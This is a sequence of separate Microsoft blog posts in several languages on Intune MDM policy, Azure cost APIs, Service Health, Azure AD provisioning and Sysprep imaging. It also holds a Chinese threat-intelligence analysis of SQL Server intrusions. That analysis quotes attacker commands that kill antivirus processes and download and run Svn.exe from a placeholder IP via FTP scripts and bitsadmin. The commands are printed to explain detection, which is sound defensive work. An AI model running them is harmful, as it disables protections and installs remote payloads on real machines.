7. For Data type select Integer and add the number 1

Supported values for this policy are as follows:

0 (default)

1 - The MDM policy is used and the GP policy is blocked.

Let’s take a look how the policy is applied

1. On the Windows 10 device, select the Windows icon > Settings > Accounts > Access work or school à under the account name select Info
2. Sync with Microsoft Intune by selecting “Sync”
3. Once the Sync as completed select “Create report”

• Once the report is completed a folder will open containing an .html file
• Open the .html report and search for “MDMwins”

GP Setting before the MDM policy takes place :

MDM setting after the policy is applied (note: Windows 10 1803 is required to override the GP):

Let’s take a look at a report in Intune regarding the policy and if it was successfully applied.  This useful to make sure the policies are actually applying or not.

Logging

Being able to investigate modifications to a device is extremely important, especially when troubleshooting. 

In event viewer we can access the event where the policy was applied as shown below.  However digging through events, especially across multiple devices, can be a difficult process.  This is where Microsoft Operations Management Suite (OMS) comes in.

Logging with Microsoft Operations Management Suite (OMS)

Within OMS there is the Log Analytics solution to manage logs from devices with the OMS agent installed.  I won’t go into details about installing the OMS agent, however I will say it’s straight forward.  Once the agent is installed (which I have it installed on all my devices so I can look at label changes with Azure Information Protection (see my previous post) and other aggregated information) we’ll need to grab the proper even log source name and populate that in Log Analytics.

Find and copy the event log source or name: Microsoft-Windows-DeviceManagement-Enterprise-Diagnostics-Provider

Paste the event log path in Log Analytics to “Windows Event Logs under Settings > Data > Windows Event Logs” as shown below:

Give the logs a few minutes to sync from the device to OMS, then run the query below in log analytics analyzer and look for the MDMWinsOverGP policy created above:

For more details about Windows 10 MDM logging please visit: https://docs.microsoft.com/en-us/windows/client-management/mdm/diagnose-mdm-failures-in-windows-10

Evaluating existing Group Policies to determine migration to MDM

Use the MDM Migration Analysis Tool (MMAT) to evaluate which Group Policies have been set for a target user/computer and cross-reference against its built-in list of supported MDM policies.

Download the MDM Migration Analysis Tool (MMAT): https://github.com/WindowsDeviceManagement/MMAT

For additional details about creating custom ADMX policies please view the following two great videos:

Enable ADMX backed policies in Intune: https://www.microsoft.com/en-us/videoplayer/embed/bdc9b54b-11b0-4bdb-a022-c339d16e7121

 

ADMX backed policy import example: https://www.microsoft.com/en-us/videoplayer/embed/a59888b1-429f-4a49-8570-c39a143d9a73

Keep up to date with MDM policies and other features via What’s new in MDM enrollment and management

https://docs.microsoft.com/en-us/windows/client-management/mdm/new-in-windows-mdm-enrollment-management

That’s it, we’ve learned that there is a new policy added to Windows 10 1803 that will control if MDM policies win over Group Policies (where applicable, not all Group Policies are available via MDM or CSP), how to investigate policies via event viewer, and aggregate those logs using Log Analytics (OMS).

Dear All,

Welcome to the TechNet Wiki Tuesday – TNWiki Article Spotlight.

In today's blog post we are going to see about  Azure: Create an IoT Hub and connect your IoT Device by Dave Rendón

If you are an Azure lover and looking to work with the combination of Azure and IoT then this is the great article to lookup. IoT is not  new ,as it was been implemented and working in many Factories from past years ,for example we can say in an Automobile industry the sensors used to check the quality of product and also lots of Machine Interface programs was been used in industry for the years, IoT is still booming and nowadays there is lots of new technology was been using in IoT to make things much better, Azure is one of the great choice to work with IoT and this article gives you simple step by step explanation to create an IoT Hub and connect your IoT Device.

Azure provides a robust platform on IoT with seamless integration and a diversity of hardware providers certified to enable IoT solutions in a seamless way. 

I believe this article will be a great feast for all who is looking to work with Azure and IoT ,don't miss to read this article from here  Azure: Create an IoT Hub and connect your IoT Device by Dave Rendón . I hope you all enjoy reading his article.

See you all soon in another blog post.

PS: Today’s banners come from VimalKalathi.

See Also:

• Azure IoT Suite
• IoT Hub

Thank you all.

Yours,
Syed Shanu
MSDN Profile | MVP Profile | Facebook | Twitter |
TechNet Wiki the community where we all join hands to share Microsoft-related information.

執筆者: Vinod Kurpad (Principal Program Manager, Azure Intelligence Platform)

このポストは、2018 年 3 月 26 日に投稿された Support for tags in cost management APIs is now available の翻訳です。

Cloud Cost Management (CCM) のさまざまな API を使用すると、Azure の使用状況と料金に関する詳細なレポートを得ることができます。Azure で普及しているタグと API との関連付けの一環として、このたび Usage Details API と Budgets API の両方でタグをサポートすることになりました。将来的には、すべての API でタグ単位でのグループ化やフィルタリングが可能になります。今回のリリースでは Enterprise Agreements (EA) サブスクリプションのタグのみが対象となりますが、今後、他の種類のサブスクリプションにも適用していく予定です。

Usage Details API のタグ

Usage Details API では、日付の範囲、リソース グループ、インスタンスなどのディメンションのフィルターをサポートしています。最新リリースでは、さらにタグが追加されました。過去分には適用されませんが、タグが適用された後のリソース使用状況レポートで使用することができます。タグによるフィルタリングと集計は、それぞれ $filter パラメーターと $apply パラメーターでサポートされます。今後も、コストのフィルタリングや集計用のディメンションを随時追加していきます。

Budgets API のタグ

サブスクリプション レベルまたはリソース グループ レベルで予算を作成し、特定のリソース セットの予算をフィルターで絞り込むことができます。これまでのリソース グループは、インスタンス、測定単位のフィルタリングに加えて、今回新たにタグをサポートします。これにより、単一のタグまたはタグのセットを使用して予算をフィルタリングできるようになります。現時点では基本操作のみに限られますが、今後はより細かいディメンションで予算をフィルタリングできるようになります。

Power BI のタグ

Power BI コンテンツ パックが更新され、コスト関連のレポートにタグを追加できるようになりました。これを使用すると、タグごとにコストを集計することができます。今後、他のディメンションも追加していく予定です。

制限事項

新たにサポートされたタグを使用する際には、以下の点にご注意ください。

1.   タグによる集計やフィルタリングをご利用いただけるのは、EA に加入しているお客様に限られます。

2.   タグによる集計やフィルタリングは、2017 年 9 月 1 日よりすべての使用状況データでご利用いただけます。2017 年 9 月 1 日より前の使用状況データについては、タグごとのコスト集計を行うことはできません。

3.   タグは、過去のコスト データに適用することはできません。既存のリソースにタグを追加しても、タグ属性が適用される前のリソースに関する使用状況データは取得できません。

使用状況の詳細の呼び出しは、ARM API および Key Based API でサポートされています。サブスクリプションやリソース グループに関する使用状況の詳細を呼び出す場合には、ARM API (英語) を使用します。管理階層内のノードでタグごとの集計やフィルタリングを行う場合には、Key Based API (英語) を使用します。いつものお願いではありますが、API を使用されたご感想やご意見、アイデアなどをお気軽にお寄せいただければ幸いです。今後の開発の参考にさせていただきます。

関連リンク

·         Budgets API に関するドキュメント (英語)

·         Usage Details API に関するドキュメント (英語)

·         企業ユーザー向けの Key Based API に関するドキュメント (英語)

·         PowerBI コンテンツ パック

·         Swagger (英語)

執筆者: Dushyant Gill (Principal Program Manager, Microsoft Azure)

このポストは、2018 年 3 月 26 日に投稿された Announcing Azure Service Health general availability – configure your alerts today の翻訳です。

このたび、Azure Service Health の一般提供を開始します。これは、Azure サービスでユーザーに影響する問題が発生した場合に、パーソナライズされたダッシュボードに対処方法などを表示する機能です。一般的な情報を伝える共通の状態ページとは異なり、お客様のリソースに合わせてカスタマイズした情報を表示します。また、リソースの可用性に影響する計画的メンテナンスなどの準備にも役立ちます。簡単にアラートを構成して、リソースに影響するサービス正常性イベントを関連するチームに通知することができます。

Azure Service Health は、2017 年 7 月のプレビュー開始以来、お客様からのフィードバックに基づき、アラート統合などのサービス改良を進めてきました。まだご利用でないお客様は、Service Health のアラートをセットアップしてお試しください。

次のビデオでは、Azure Service Health の使用例を簡単に紹介しています。

Azure Service Health のダッシュボードでは、以下のような情報を確認できます。

サービスに関する問題 – リソースに影響する Azure サービスの問題。いつ、どのサービス、どのリージョンで問題が発生したか、どのリソースが影響を受けているかを迅速に把握することができます。問題の参照リンクを担当チームと共有したり、ポータルにアクセスできないユーザーのためにサマリーを PDF 形式でダウンロードしたりすることが可能です。

計画的メンテナンス – リソースに影響する Azure での計画的メンテナンス作業。メンテナンスがいつ開始されるかを把握できます。仮想マシンのメンテナンスの場合、影響を受ける VM を明記したリストも表示されるため、スケジュールを調整することができます。

正常性に関する推奨事項 – ダウンタイムの発生を防止するための推奨アクションのサマリー。古い Azure 機能の廃止や使用率クォータの超過などを通知します。

正常性に関する履歴 – リソースの正常性に影響を与えた過去のサービスの問題。問題解決後のサマリーも確認することができます。

リソースの正常性 – リソース レベルの正常性に関するインサイト。VM などの特定のリソースを検索して、現在または過去の正常性に関する問題を確認することができます。

正常性に関するアラート – Service Health のイベントをプロアクティブに通知します。アラートを作成して、注意すべき問題を担当チームに通知します。特定のサブスクリプション、サービス、リージョンのいずれかまたは組み合わせを選択し、メール、SMS、Webhook、Azure モバイル アプリなどでアクション グループごとにアラートを送信します。

Service Health のアラートは完全に構成可能で、以下のように、社内の適切なユーザーに適切な通知を送信することができます。

• 開発/テスト用サブスクリプションのリソースに影響がある場合に、開発チームにメールを送信する。
• 運用環境用サブスクリプションのリソースに影響がある場合に、ServiceNow の更新に関するアラートを Webhook で通知する。
• 特定リージョンのリソースに影響がある場合に、特定の番号宛てのアラートを SMS で送信する。

こちらから Service Health のアラートを作成して、今すぐお試しください。

マイクロソフトでは、Azure Service Health に関するフィードバックをお待ちしております。Azure ポータルの右上のフィードバック ボタンから、ぜひご意見をお聞かせください。今後の開発の参考とさせていただきます。

関連資料

Azure Service Health の概要ページ

Azure Service Health のドキュメント

Azure ポータルから Azure Service Health を使用する

マイクロソフト パートナー ネットワーク チームでは、パートナー様を対象として月例のウェビナーを開催し、製品やプログラムについての最新情報や注意点などをいち早くお届けできるように努めています。ウェビナーは毎回 1 時間程度、1 トピック 10 分から 15 分で完結する内容となっています。

4月の開催日程は「4月19日（木）13:30～14:30」です。

パートナー様でご参加にご興味があります方は、以下よりご登録ください。

▼ご登録はこちらから

過去のトピックの例

• Microsoft Azure、Office 365、Windows 10、Surface などの製品についての最新情報、注意点など
• 働き方改革ムーブメントなどの施策、キャンペーンのご紹介
• 各種イベントのご案内、スポンサー プログラム紹介
• mstep トレーニング最新情報　他

いままで提供された情報の例

月例ウェビナーで過去に紹介されたトピックの例です。ウェビナーでは他にも様々なトピックが取り上げられ、製品やプログラムについての最新情報をいち早く手に入れることができます。

(録画を部分的に切り出しています)

撰 /Rob Mead, Senior Software Engineer - Microsoft Threat Intelligence Center

今年早些時候，Greg Cottingham 撰寫了一篇偉大的文章，打破了Azure 安全中心發現的針對SQL Server 的攻擊案例。在這篇文章中，我們將更詳細地介紹安全中心如何分析數據以檢測這些類型的攻擊，以及這些方法的輸出如何用於轉向其他共享某些常用技術的入侵。

隨著攻擊技術的迅速發展，許多組織都在努力跟上步伐。安全人才的稀缺加劇了這種情況，公司不能僅僅依靠人類的檢測手段。通過烘焙算法中人類安全分析師的直覺，Azure 安全中心可以自動適應不斷變化的攻擊模式。

讓我們看看安全中心如何使用這種方法來檢測針對 SQL Server 的攻擊。通過分析MSSQLSERVER 帳戶執行的進程，我們發現它在正常情況下非常穩定 - 它幾乎始終執行一組固定的操作。這個帳戶的穩定性使我們能夠建立一個模型，以檢測在發生攻擊時發生的異常活動。

建立模型

在安全中心可以構建此數據的模型之前，它會執行一些前處理來折疊減少相似目錄的流程執行。 否則，模型會將這些視為不同的過程。它在流程目錄上使用距離函數進行聚類，然後匯整流程名稱共享的流行程度。 下面可以看到這個過程的一個例子：

這可以簡化為單個摘要狀態：

它還處理數據以捕獲託管執行程序，例如 regsvr32.exe 和 rundll32.exe，它們本身可能很常見，但可用於運行其他文件。 通過將自己作為執行文件運行的文件視為由此機制運行的任何代碼，都可以獲得洞察。

使用此規範化數據，Azure 安全中心檢測引擎可以繪製訂閱中由 MSSQLSERVER 執行的流程普遍性。 由於帳戶的穩定性，這種簡單的方法會根據進程名的稱和位置生成一個正常行為的健壯模型。 這個模型的可視化可以在下面的圖中看到:

發現異常

當像 SQL Server 這樣的攻擊目標被鎖定時，攻擊者的前幾個動作會受到高度限制。他們可以嘗試各種策略，這些策略都會留下流程執行事件的痕跡。 在下面的示例中，我們使用安全中心使用來自訂閱的數據在遇到 SQL Server 攻擊時顯示相同的模型。 這一次，它發現了包含一些有趣數據的低流行率、執行尾部的異常情況：

讓我們更深入地看一下模型確定的一些不尋常的執行情況：

taskkill /im 360rp.exe /f
taskkill /im 360sd.exe /f
taskkill /im 360rps.exe /f
ntsd -c q -pn 360rp.exe
ntsd -c q -pn 360sd.exe
ntsd -c q -pn 360rps.exe

在第一階段，我們看到多次嘗試禁用在主機上運行的防病毒引擎。 第一個使用內置的工具 taskkill 來結束進程。 第二個使用調試器'ntsd'附加到它希望用-pn參數破壞的進程，並在成功附加到目標後執行指令 'q'。 'q' 指令使調試器終止目標應用程序。

在禁用防病毒引擎的情況下，攻擊者可以免費下載並從互聯網上運行其第一階段。 它以幾種不同的方式做到這一點：

第一個是通過 FTP 協議。 我們看到攻擊者使用echo 指令將一系列 FTP 指令寫入文件中：

echo open xxx.xxx.xxx.xxx>So.2
echo 111>>So.2
echo 000>>So.2
echo get Svn.exe >>So.2
echo bye

這些指令被執行：

ftp -s:So.2

該文件被刪除，並運行可執行文件：

del So.2
Svn.exe

如果這種下載可執行文件的方法失敗，則此次攻擊將回到從本次通過 HTTP 從相同地址獲取文件的第二種機制：

bitsadmin /transfer n http://xxx.xxx.xxx.xxx:xxxx/Svn.exe c： Users Public Svn.exe"

在這裡，我們看到攻擊者使用 bitsadmin 工具從互聯網上下載可執行文件。

使用機器學習，Azure 安全中心會針對這種異常活動發出警報 - 所有這些都不需要專業知識或人為乾預。 以下是 Azure 安全中心內部的這些警報之一：

發掘輸出

儘管這種方法僅限於在特定情況下檢測攻擊，但它也充當檢測工廠，自動發現攻擊者使用的新技術。

讓我們再看看 bitsadmin 的例子：

bitsadmin  /transfer n http://xxx.xxx.xxx.xxx:xxxx/xxx.exe

c:UsersPublicxxx.exe"

仔細觀察，這看起來像是攻擊者可以使用操作系統的內置功能執行遠程文件的一般技術，但它是通過演算法而不是安全專家向我們展示的。

雖然 bitsadmin 的合法使用很常見，但它可執行文件的遠程位置、作業名稱和目標目錄都是可疑的。 這也為新的檢測提供了基礎，特別針對不常見的 bitsadmin 執行，而不管它們是否由 MSSQLSERVER 帳戶運行。

因此，通過這種方法生成的 bitsadmin 和其他警報可作為獨立檢測機會進行開發。 並且，它們還會提醒客戶其訂閱上發生的其他攻擊，其中一些常見技術由另一個攻擊媒介共享。

總結

通過使用 Azure 安全中心，使用 SQL Server 部署的客戶將自動受益於這種檢測方法。 因為它能基於異常、自適應地產生策略，在沒有人類專家參與的情況下提醒新的攻擊。 這種新技術產生的檢測機會將反饋到所有安全中心客戶上。

有關本文中提及的攻擊類型以及如何減輕攻擊類型的更多信息，請參閱博客，“Azure 安全中心如何幫助揭示 Cyberattack”。

要了解有關 Azure 安全中心中的檢測的更多信息，請參閱以下內容：

• Azure 安全中心的檢測功能
• 在 Azure 安全中心中管理和響應安全警報

こんにちは、 Azure & Identity サポート チームの平形です。

今回は、Azure AD のプロビジョニング機能についてご紹介します。

プロビジョニングは Azure AD と連携する主に他社から提供されている SaaS アプリケーションに Azure AD 上に存在するアカウント情報を自動で作成・更新・削除を行う機能です。オンプレミスの Active Directory と Azure Active Directory 間は Azure AD Connect で同期できますが (Azure AD 視点でアカウントを利用できるようにするという意味でプロビジョニングと呼ぶこともできます)、更に Azure AD と連携している SaaS アプリケーションが利用するアカウント情報を同期させることで (今回の Blog で紹介するプロビジョニングです)、それぞれのアカウントを一元管理し、シングル サインオンを実現できます。

今回はプロビジョニング機能の概要とよくあるお問い合わせを紹介します。

プロビジョニングは大まかに分けると以下のフローに分けて処理が行われます。
(括弧内は Azure AD 監査ログに出力されるアクティビティです)

プロビジョニングの初期同期

1. テナント上のユーザー・グループ オブジェクト情報を属性マッピングで定義された値に基づき抽出する。 (Import)
2. 1. で抽出した属性を基に、対象の SaaS アプリケーション上に同様のユーザー・グループが存在しているかを確認する。同時にプロビジョニング対象のユーザー・グループであるかを確認し、対象外のものを列挙する。(Synchronization rule action)
3. プロビジョニングを行う対象のユーザー・グループ オブジェクトを SaaS アプリケーションに対して作成・更新・削除処理の命令として送信する。同期の結果を Azure AD 上に格納する。 (Export)

プロビジョニングの差分同期

1. Azure AD 上で動作しているユーザー・グループ オブジェクトの更新状態を監視している Sync Engine によって検知されたオブジェクトとこれまでの同期の結果を比較し、変更のあったオブジェクトのみにプロビジョニングのチェック処理を行う。 (Import/Synchronization rule action)
2. プロビジョニング対象のオブジェクトを SaaS アプリケーション上に作成・更新・削除処理を行う。同期の結果を Azure AD に格納する。 (Export)

初期同期はプロビジョニングを初めて構成し、プロビジョニングを有効にしたタイミングで発生する以外に、属性マッピングの変更や、「現在の状態を消去して、同期を再開します」のチェックボックスを ON にした際にも発生します。

初期同期、差分同期の 1 で Azure AD のアカウントが SaaS アプリケーション上に存在するかの確認は、属性マッピングで定義した「照会の順序」にて設定した内容に基づいて実行されます。照会の順序を複数設定した場合、照会の順序にて設定した番号の順に評価を行い、 1 つでも同一の値が SaaS アプリケーション上で見つかった場合には一意のアカウントとして更新処理が発生し、全く一致するアカウントがなかった場合はアカウントの新規作成を実施します。

照会の順序がどういうものか Azure AD Connect に詳しい方は、 Azure AD Connect の SourceAnchor を思いおこしてみてください。 それと同じ考え方です (ただ Azure AD Connect の場合には複数 SourceAnchor となるものを指定することはできませんが)。例えば Google Apps の場合、既定ではユーザー アカウントは Azure AD 上の userPrincipalName 属性を Google Apps 上の Login 属性とマッチングを行い、同一であれば同じアカウントであると判定します。

グループ アカウントの場合は Azure AD 上の mail 属性を、 Google Apps 上の Mail 属性とマッチングを行います。
** マッチングする属性や仕組みは連携アプリケーションによって異なります。

//参考: プロビジョニング設定画面

よくあるお問い合わせ・ご質問

Q. プロビジョニング処理の結果を知りたい

A. プロビジョニングの設定画面、もしくは Azure AD 監査ログを参照ください。下記手順で監査ログの取得が可能です

1. Azure AD 管理ポータルに全体管理者権限を持つユーザーでサインインを行います。
2. 左ペイン上で [Azure Active Directory] を選択します。
3. [監査ログ] を選択します。

// 参考: Google Apps にアカウントが作成された際の監査ログ

Q. プロビジョニング対象に Azure AD のセキュリティ グループを割り当てているが、セキュリティ グループのメンバーを入れ替えても変更したユーザー情報が SaaS アプリケーションにプロビジョニングされない

A. グループの割り当てを一度解除し、再度グループの割り当てを実施ください

プロビジョニング設定を行う前にセキュリティ グループの割り当てを行っていた場合、 Azure AD 上のセキュリティ グループのメンテナンスを行ってもメンテナンスした結果がプロビジョニングの同期対象と認識しない事例があります。

本来、グループのメンバーを入れ替えても再割り当ての作業は必要無いのですが、このような事象が発生した場合にグループの割り当てを一旦解除し、再度同じグループを割り当てる操作は有効です。割り当ての解除・再割り当てを実施しても事象が改善しない場合には弊社までお問い合わせください。

Q. 初期同期を発生させた際に監査ログ上にプロビジョニング対象のユーザー以外が出力されている

A. 初期同期時は Azure AD 上のすべてのアカウントに対して、差分同期の場合は変更が発生した Azure AD 上のアカウントに対して Import/Synchronization rule action 処理が発生するため、実際は同期対象外のユーザーについても監査ログ上には出力されます。通常の同期時にも対象外のユーザーが監査ログ上残ることもありますが、 SaaS アプリケーションに対してプロビジョニングは行われません。プロビジョニングされたかにつきましては監査ログの “Export” という名前の処理結果を確認ください。

Q. プロビジョニング モードを「自動」から「手動」に変更したい。プロビジョニングを停止したい

A. 「プロビジョニング状態」を 「オフ」にすることでプロビジョニングを無効化できます。プロビジョニング モードを自動から手動に戻すことはできません。

Q. プロビジョニングがうまくいかなくなってしまった。初期同期を再度実行したりユーザー・グループの割り当てを再度行っても改善されない

A. Azure サポートの活用を検討ください。一般的に調査の際には次のような情報が必要です。

詳細はお問い合わせの後でご案内を差し上げていますが、現象の発生タイミング、発生頻度に関する情報と併せまして事前に用意いただければと思います。

• 監査ログ
• テナント ID ([Azure Active Directory] - [プロパティ] - [ディレクトリ ID] より確認可能です)
• プロビジョニングの設定画面

// 参考: プロビジョニングの設定画面

こちらでは同期の詳細を割愛しておりますが、お問い合わせ頂く際には同期の詳細結果も見えるように情報をお寄せください。

[参考情報]
Azure Active Directory による SaaS アプリへのユーザー プロビジョニングとプロビジョニング解除の自動化
https://docs.microsoft.com/ja-jp/azure/active-directory/active-directory-saas-app-provisioning

ご不明な点等がありましたら、ぜひ弊社サポート サービスをご利用ください。

※本情報の内容（リンク先などを含む）は、作成日時点でのものであり、予告なく変更される場合があります。

こんにちは、Windows プラットフォーム サポート 宮崎です。

今回は、Windows 10 の環境で Sysprep を用いたマスターイメージを作成する際の一般的な注意点やサポート部門より推奨する展開方法を紹介します。
これから初めてマスターイメージを作成する方もすでにマスターイメージの展開を行っておられる方も、ぜひ一読いただき貴社の展開内容と照らし合わせることでお役に立ててください。

目次

本ブログの目次とサマリーです。

1. Sysprep の考え方・・・マスターイメージの作成という工程には計画・工数を要します。
2. マスター イメージの前提条件・・・主に Sysprep を実行したボリュームライセンス メディアを利用します。
3. マスターイメージとして設定可能な範囲・・・設定可能な箇所は検証いただく必要があります。
4. 品質更新プログラムの適用・・・最新の品質更新プログラムの適用をお勧めします。
5. アップグレード環境・・・ご利用予定のバージョンの OS を新規にクリーン インストールした環境をお勧めします。
6. 複数ユーザープロファイルが存在する環境・・・単一のユーザー プロファイルで作業を完結することをお勧めします。
7. ドメイン参加状態での Sysprep・・・ドメイン参加のタイミング・注意点を解説します。
8. 最後に
9. 各項の参考技術情報

1. Sysprep の考え方

Sysprep はシステムを大量展開する際に、マスターイメージの作成を支援するためのツールであり、イメージ作成時において、実行するものとなります。そのため、Sysprep コマンドはあくまでマスターイメージの作成という工程の中で行うことが想定され、運用環境やイメージ作成以外を目的とした利用はサポートされません。

また、Sysprep は様々な利用用途の実現を必ずしも保証するものではなく、本記事で紹介しています通り様々な注意点があります。そのためイメージ作成・展開にあたって計画的な検証工程や検証にあたっての工数をお見積りいただくこと、加えて、イメージ作成において不要な作業は実施しないことが推奨されます。

2. マスター イメージの前提条件

配布可能なイメージは以下を前提条件としています。

条件 A. Sysprep を実施していること

Sysprep は端末の固有の情報を初期化してそのイメージを別の端末で再利用するためのツールです。端末固有の情報は、SID のほか、CMID や SusClientID 等、様々な ID が含まれていますので、Sysprep を実施せずに端末を複製した場合、端末固有の情報が複製されてしまい幅広い範囲で問題が生じる可能性があります。

条件 B. ボリュームライセンス契約より入手したイメージを用いて構築すること

お客様がお使いいただけるイメージは下記の 3 種です。

• ボリュームライセンス サービスセンター (VLSC) より入手可能なイメージ
• MSDN サブスクリプションより入手可能なテストイメージ
• OEM ベンダーのイメージ作成のために別途提供しているイメージ

実際のイメージの展開にあたって、Windows の再イメージング権はボリューム ライセンスのメディアにのみ付与しています。OEM ベンダー以外のお客様はボリューム ライセンスをご契約の上、イメージ入手してください。ボリュームライセンスのイメージをつかって、実際のマシンに展開する際に個々のマシンに対するドライバーは、提供元より個別に入手しイメージにインストールしてください。

なお、OEM のマシンには、上記の再イメージング権が付与されておらず、OEM ベンダー以外のお客様は権利上、OEM のマシンを利用した Sysprep 実施、マスタイメージの作成は許可されていません。また、イメージ自体にも OEM ベンダー様によるカスタマイズが行われていることで想定されないエラーなども発生する可能性があります。

3. マスターイメージとして設定可能な範囲

Sysprep のツール自体は現行 OS でサポートされていますが、設定可能な範囲は実際に Sysprep を実行して得られた結果の範囲までです。OS やアプリケーションの設定によってはマスターイメージに含めることができない場合があります。また、OS の設定箇所は非常に多数にわたり、それらすべての設定できる箇所と設定できない箇所を網羅するリストはありませんので、あらかじめ検証環境にて設定可能か検証してください。

4. 品質更新プログラムの適用

マスターイメージの作成の計画時点の最新の累積的な品質更新プログラムを適用することをお勧めしています。これにより既知の問題をあらかじめ回避することが可能なためです。

また、品質更新プログラムは Windows 10 リリース 情報より KB 番号が確認でき、Microsoft Update カタログからスタンドアロンインストーラーを入手することが可能です。逐一、Windows Update から品質構成プログラムをダウンロード・インストールする工数を削減できるため利用をお勧めしています。

5. アップグレード環境

Windows 10 で Version 1703 から Version 1709 へアップグレードされた環境での Sysprep にてすでに下記のような問題が報告されています。

Title: MiracastView パッケージ Windows 10 バージョン 1709 にコンピューターをアップグレードした後 sysprep エラーが発生します。
URL: https://support.microsoft.com/ja-jp/help/4057974/miracastview-cause-sysprep-error-windows-10-version-1709

上記の現象の場合は、回避策を案内している次第ではありますが、回避策の実施のために別途作業が伴うことやアップグレード特有の問題を未然に防ぐためにもサポート部門からはアップグレード環境ではなく利用予定のバージョンを新規に作成することをお勧めしています。

お客様の業務の要件によっては、いったん作成手順を実施したイメージに対して、最後にアップグレードのみをかけて Sysprep を行うことでバージョンごとのイメージ作成の工数を削減するという観点もありますが、アップグレード自体が多くの機能の変更を及ぼし、その変更によって一部の設定が変更・初期化される動作もありますのでアップグレード環境を組み合わせたマスターイメージの作成計画のメリットは十分ではありません。

Sysprep の考え方としては、マスターイメージの作成に対して不要な作業を実施しないことが推奨されます。アップグレード環境をマスターイメージとして取り扱うことは通常、メリットがないばかりでなく、利用予定のバージョンでクリーン インストールした環境での Sysprep の実施よりも他の動作影響を引き起こす可能性が高くなっています。

ボリュームライセンスを契約しているお客様であれば、各バージョンのイメージは個別に入手可能です。利用予定のバージョンのイメージを入手し、そのイメージを利用して作成計画を検討いただくことをお勧めします。

6. 複数ユーザープロファイルが存在する環境

複数のユーザー プロファイルが存在するシナリオにおいて Sysprep の使用は想定されておらず、既存のユーザー プロファイルが破損する等の影響を弊社に寄せられています。マスターイメージの作成において、複数のユーザーでログオンし作業するメリットは通常ありませんので、初回のログオン時に作成した一つのユーザーで作業を完結することで、ユーザー プロファイルに起因するトラブルを未然に防ぐことが可能です。

7. ドメイン参加状態での sysprep

ドメイン参加状態での sysprep の実施は弊社サポート部門としてはお勧めしていません。ドメインに参加することで、意図しないグループ ポリシーが適用される可能性が非常に高く、これらのポリシー設定によって Sysprep の実施が失敗するリスクも高くなります。またドメインに一度参加した後に離脱して WORKGROUP の環境に戻しても、すべてのポリシー設定が既定のものに戻るわけではありません。

特定のアプリケーションや設定のために、ドメイン参加が必須の場合でも、運用環境との OU を分けるなどなるべく必要のないポリシーが適用されないよう作業することで Sysprep 失敗のリスクが軽減されます。

なお、展開後のドメイン参加が必要となる状況では、Sysprep を実行した際にドメイン参加させるための以下のブログ記事に沿うように業務要件を検討いただくことをお勧めします。

Title: Sysprep 実行時にドメイン参加を自動化する方法
URL: https://blogs.technet.microsoft.com/askcorejp/2010/06/30/sysprep-2/

8. 最後に

マスターイメージの作成に用いる Sysprep は、展開時に設定を自動化・共通化するために非常に有用なツールですが、上記のように複数の注意点があります。お客様の業務要件をどの程度満たせるかについては十分な検証の工数が必要です。

トラブルを未然に防ぎ工数を削減するためにも、既知の制限・制約については考慮の上、ご検討を進めていただけましたら幸いです。

本記事におきましては予告なく内容を変更させていただくことがあります。
今後、情報のアップデートがあれば、本ブログにて引き続き情報を提供いたします。

9. 各項の参考技術情報

1. Sysprep の考え方

Sysprep の概要やサポート範囲について下記技術情報にて紹介しています。

Title: Sysprep (システム準備) の概要
URL: https://msdn.microsoft.com/ja-jp/library/windows/hardware/dn938335(v=vs.85).aspx

Title: Unsupported Sysprep scenarios
URL: https://support.microsoft.com/en-us/help/828287/unsupported-sysprep-scenarios

2. マスター イメージの前提

前提条件に関して以下の技術情報より記載しています。

Title: Sysprep Command-Line Options
URL: https://docs.microsoft.com/en-us/windows-hardware/manufacture/desktop/sysprep-command-line-options

///// 抜粋ここから /////
Important
You must use the Sysprep /generalize command to generalize a complete
Windows installation before you can use the installation for deployment
to a new computer, whether you use imaging, hard disk duplication,
or another method. Moving or copying a Windows image to a different
computer without running the Sysprep /generalize command is not supported.
///// 抜粋ここまで /////

Title: OS プレインストール PC (OEM PC) の再イメージング (コピーによる社内展開) について
URL: https://support.microsoft.com/ja-jp/help/945472

3. マスターイメージとして設定可能な範囲

下記技術情報ではサーバーの役割の Sysprep サポート有無について記載しています。サーバー製品に関しましては、大量展開が想定されていないサーバーの役割や機能などもありますので、これらの役割や機能が有効にされている状態での Sysprep の実施はサポートされません。

Title: Sysprep Support for Server Roles
URL: https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-8.1-and-8/hh824835(v=win.10)

4. 品質更新プログラムの適用

累積的な更新プログラムの事前適用を推奨することを以下の技術情報にて紹介しています。

Title: マスター イメージ作成時の更新の適用について
URL: https://blogs.technet.microsoft.com/askcorejp/2016/12/08/update-before-sysprep/

5. アップグレード環境について

弊社から OS のアップグレードに伴う、お客様開発のアプリのための非互換情報のリストを提供していない理由を下記のブログにて解説していますが、これはアップグレードに伴う OS の変更箇所を網羅した情報を提供していないことと技術的背景については同様となります。参考にしていただけますと幸いです。

Title: Part 5-b. Windows 10 導入時に考え方・やり方を変えるべきポイント ? アプリ編②
URL: https://blogs.msdn.microsoft.com/nakama/2016/08/18/win10waas-part5b/

また、アップグレードに伴い一部の設定が変更・初期化されることがありますが、この動作についても、この技術的な背景と同様にリスト提供が原理的にしかねるものとなります。

Title: Windows 10 の仕様とシステム要件
URL: https://www.microsoft.com/ja-jp/windows/windows-10-specifications#upgrade

///// 抜粋ここから /////
アップグレードと同時に多数のアプリケーション、ファイル、設定が移行されますが、一部のアプリケーションや設定が移行されない場合があります。
///// 抜粋ここまで /////

6. 複数ユーザープロファイルが存在する環境

個別記事を以下に紹介しています。

Title: 複数のユーザー プロファイルが存在する状態で Sysprep を実施した際に予期しない問題が発生する
URL: https://blogs.technet.microsoft.com/askcorejp/2016/06/27/複数のユーザー プロファイルが存在する状態で Sysprep を実施した際に予期しない問題が発生する/

いつもお世話になります。Azure & Identity サポート チームの加藤です。
本記事では「ハイブリッド Azure Active Directory 参加済みデバイスの構成」についてご案内します。
本記事がみなさまの一助になれば幸いです。

1. 本記事の目的
2. ハイブリッド Azure Active Directory 参加済みデバイスの構成とは
3. 「手順 1 : サービス接続ポイントの構成」についての補足
4. 「手順 2 : 要求の発行のセットアップ」についての補足
5. Windows 10 のデバイス登録の流れについて
6. Windows 10 のデバイス登録について注意事項
7. ダウンレベルの Windows (Windows 7、Windows 8.1) のデバイス登録の流れ
8. ダウンレベルの Windows (Windows 7、Windows 8.1) のデバイス登録について注意事項

1. 本記事の目的

本記事の目的は、以下の弊社公開情報を補足することです。

ハイブリッド Azure Active Directory 参加済みデバイスの構成方法

